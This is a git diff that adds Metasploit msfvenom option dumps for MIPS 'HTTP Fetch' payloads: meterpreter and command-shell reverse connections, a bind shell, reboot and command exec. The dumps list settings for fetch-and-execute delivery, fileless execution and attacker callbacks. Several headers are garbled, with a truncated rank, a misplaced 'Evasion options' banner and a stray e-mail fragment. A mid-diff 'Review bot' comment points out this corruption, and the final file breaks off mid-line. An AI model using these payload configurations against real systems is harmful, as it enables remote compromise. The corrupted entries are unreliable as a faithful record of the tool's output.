@@ -0,0 +1,97 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/mipsbe/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Adam Cammack + Brent Cook + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME QibeYbciB no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. 
+ AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + 
PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-mipsbe-reboot.txt b/msfvenom/payload_options/cmd-linux-http-mipsbe-reboot.txt new file mode 100644 index 0000000..765a6f0 --- /dev/null 
+++ b/msfvenom/payload_options/cmd-linux-http-mipsbe-reboot.txt 
@@ -0,0 +1,69 @@ + + Name: HTTP Fetch, Linux Reboot + Module: payload/cmd/linux/http/mipsbe/reboot + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Michael Messner + rigan - + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME vwzXdDryf no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from an HTTP server. + + A very small shellcode for rebooting the system. + This payload is sometimes helpful for testing purposes or executing + other payloads that rely on initial startup procedures. 
+ + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-mipsbe-shell-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-mipsbe-shell-reverse_tcp.txt new file mode 100644 index 0000000..a937471 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-mipsbe-shell-reverse_tcp.txt 
@@ -0,0 +1,91 @@ + + Name: HTTP Fetch, Linux Command Shell, Reverse TCP Stager + Module: payload/cmd/linux/http/mipsbe/shell/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + juan vazquez + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME uTHuAvxylJ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from an HTTP server. + Spawn a command shell (staged). + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy 
false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-mipsbe-shell_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-http-mipsbe-shell_bind_tcp.txt new file mode 100644 index 0000000..6ec75f4 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-mipsbe-shell_bind_tcp.txt 
@@ -0,0 +1,74 @@ + + Name: HTTP Fetch, Linux Command Shell, Bind TCP Inline + Module: payload/cmd/linux/http/mipsbe/shell_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + scut + vaicebine + Vlatko Kosturjak + juan vazquez + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME EtbkdTGdbo no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from an HTTP server. + Listen for a connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-mipsbe-shell_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-mipsbe-shell_reverse_tcp.txt new file mode 100644 index 0000000..829a90d --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-mipsbe-shell_reverse_tcp.txt 
@@ -0,0 +1,79 @@ + + Name: HTTP Fetch, Linux Command Shell, Reverse TCP Inline + Module: payload/cmd/linux/http/mipsbe/shell_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + rigan + juan vazquez + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME LTdmakIVHUuT no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from an HTTP server. + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-mipsle-exec.txt b/msfvenom/payload_options/cmd-linux-http-mipsle-exec.txt new file mode 100644 index 0000000..ec54ec2 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-mipsle-exec.txt 
@@ -0,0 +1,70 @@ + + Name: HTTP Fetch, Linux Execute Command + Module: payload/cmd/linux/http/mipsle/exec + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Michael Messner + entropy + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD yes The command string to execute +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME BHtMUdPnuAr no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from an HTTP server. + + A very small shellcode for executing commands. + This module is sometimes helpful for testing purposes as well as + on targets with extremely limited buffer space. 
+ + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-mipsle-meterpreter-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-mipsle-meterpreter-reverse_tcp.txt new file mode 100644 index 0000000..a9c0cab --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-mipsle-meterpreter-reverse_tcp.txt 
@@ -0,0 +1,100 @@ + + Name: HTTP Fetch, Reverse TCP Stager + Module: payload/cmd/linux/http/mipsle/meterpreter/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Norm +Evasion options for payload/cmd/linux/http/mipsle/meterpreter/reverse_tcp: +========================= + + juan vazquez + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME UlqevxizRg no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from an HTTP server. + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see 
https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager 
should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-mipsle-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-http-mipsle-meterpreter_reverse_http.txt new file mode 100644 index 0000000..32d149a --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-mipsle-meterpreter_reverse_http.txt 
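Review bot: the header block of the meterpreter/reverse_tcp stager file is not a faithful capture and should be regenerated rather than hand-fixed: `Rank: Norm` is truncated (every other file says `Normal`), the `Provided by:` label is missing, and the `Evasion options for ...` banner with its `=====` underline is wedged between `Rank:` and the author list (`juan vazquez`, `tkmru`), which in the other files follows `Provided by:` directly and also carries the fetch-wrapper authors Brendan Watters and Spencer McIntyre. While regenerating, note that `FETCH_FILENAME UlqevxizRg` is a fresh random string on every msfvenom run, so each regeneration of these option dumps will produce a spurious diff on that line; post-processing the value to a fixed placeholder would keep the files stable.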
@@ -0,0 +1,104 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/mipsle/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/http/mipsle/meterpreter_reverse_http: +========================= + +ok@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME gfkVVWTotp no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex 